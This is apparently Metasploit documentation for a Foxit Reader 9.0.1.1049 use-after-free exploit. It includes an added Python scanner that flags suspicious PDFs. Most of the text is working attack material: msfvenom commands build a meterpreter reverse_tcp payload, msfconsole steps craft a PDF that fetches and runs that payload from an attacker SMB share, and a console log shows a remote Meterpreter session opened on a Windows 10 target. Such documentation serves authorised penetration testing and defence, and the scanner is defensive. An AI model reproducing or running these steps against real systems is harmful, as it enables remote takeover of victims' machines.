Description
Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialized memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a UNC share path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 7 x64 and Windows 10 Pro x64 Build 17134. Windows 10 Enterprise needs to have insecure logons enabled for the exploit to work as expected.
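The description above names a specific combination of artefacts in the generated document: embedded JavaScript, a text annotation, Uint32Array usage and a UNC share path to an executable. The following added example (not part of the module or its documentation) is a static triage scanner that flags a PDF when that combination is present, inflating FlateDecode streams so that compressed JavaScript is not missed. The minimal sample PDF, its JavaScript and the 192.0.2.10 address are constructed placeholders.

```python
import re
import zlib

# Indicators drawn from the module description: JavaScript, a text
# annotation, Uint32Array usage, and a UNC share path to an executable.
INDICATORS = {
    "javascript": re.compile(rb"/(JS|JavaScript)\b"),
    "text_annotation": re.compile(rb"/Subtype\s*/Text\b"),
    "uint32array": re.compile(rb"\bUint32Array\b"),
    "unc_exe_path": re.compile(rb"\\{2,}[\w.-]+\\+[^\s'\"]*\.exe\b", re.I),
}
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def inflate(blob: bytes) -> bytes:
    """Return the FlateDecode-expanded stream, or b'' if it is not zlib data."""
    try:
        return zlib.decompressobj().decompress(blob)
    except zlib.error:
        return b""


def triage(pdf: bytes) -> dict:
    """Scan the raw file plus every inflated stream; report which indicators hit."""
    views = [pdf] + [inflate(m.group(1)) for m in STREAM_RE.finditer(pdf)]
    return {name: any(rx.search(v) for v in views) for name, rx in INDICATORS.items()}


def is_suspicious(pdf: bytes) -> bool:
    """JavaScript plus at least two of the other three indicators."""
    hits = triage(pdf)
    return hits["javascript"] and sum(hits[k] for k in hits if k != "javascript") >= 2


def build_sample_pdf(js: bytes, compress: bool) -> bytes:
    """Constructed minimal PDF: one JS OpenAction stream and one text annotation."""
    body = zlib.compress(js) if compress else js
    filt = b"/Filter /FlateDecode " if compress else b""
    return (b"%PDF-1.7\n"
            b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
            b"2 0 obj << /S /JavaScript /JS 3 0 R >> endobj\n"
            b"3 0 obj << " + filt + b"/Length %d >>\nstream\n" % len(body)
            + body + b"\nendstream\nendobj\n"
            b"4 0 obj << /Type /Annot /Subtype /Text /Rect [0 0 10 10] >> endobj\n"
            b"%%EOF\n")


# Constructed stand-in for the JavaScript a malicious document might carry;
# it contains only the indicator strings, no exploit logic.
SAMPLE_JS = (b"var buf = new Uint32Array(0x100);\n"
             b"var target = '\\\\\\\\192.0.2.10\\\\share\\\\tmp.exe';\n")
BENIGN_PDF = b"%PDF-1.7\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"
```

Any single indicator is common in benign documents; only the combination is worth escalating, and the scanner is a triage aid rather than a replacement for opening the file in a sandbox.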
Vulnerable Application
Foxit Reader v9.0.1.1049 and earlier
Verification Steps
1. ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> --arch x86 -f exe -o /share/path/tmp.exe
2. chmod 777 /share/path/tmp.exe
3. ./msfconsole -qx 'use exploit/windows/fileformat/foxit_reader_uaf ; set exename tmp.exe ; set share <share> ; set lhost <lhost> ; run'
4. use multi/handler
5. set payload windows/meterpreter/reverse_tcp
6. set lhost <lhost>
7. run -j
8. Copy the PDF to the target. Start Foxit Reader, then open the PDF from Foxit's menu.
Note: The target machine running Foxit Reader will need network access to the system hosting the exe.
Scenarios
Foxit Reader v9.0.1.1049 running on Windows 10 Pro x64 Build 17134
msfdev@simulator:~/git/metasploit-framework
$ ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.22.222.197 LPORT=4444 --arch x86 -f exe -o /opt/malicious/tmp.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /opt/malicious/tmp.exe
msfdev@simulator:~/git/metasploit-framework
$ chmod 777 /opt/malicious/tmp.exe
msfdev@simulator:~/git/metasploit-framework
$ ./msfconsole -qx 'use exploit/windows/fileformat/foxit_reader_uaf ; set exename tmp.exe ; set share tmp ; set lhost 172.22.222.197 ; run '
exename => tmp.exe
share => tmp
lhost => 172.22.222.197
[*] share_path: \\172.22.222.197\tmp\tmp.exe
[+] test.pdf stored at /home/msfdev/.msf4/local/test.pdf
msf5 exploit(windows/fileformat/foxit_reader_uaf) > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 172.22.222.197
lhost => 172.22.222.197
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 172.22.222.197:4444
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.197:4444 -> 172.22.222.200:49673) at 2018-08-21 07:50:34 -0500
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : DESKTOP
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: DESKTOP\msfdev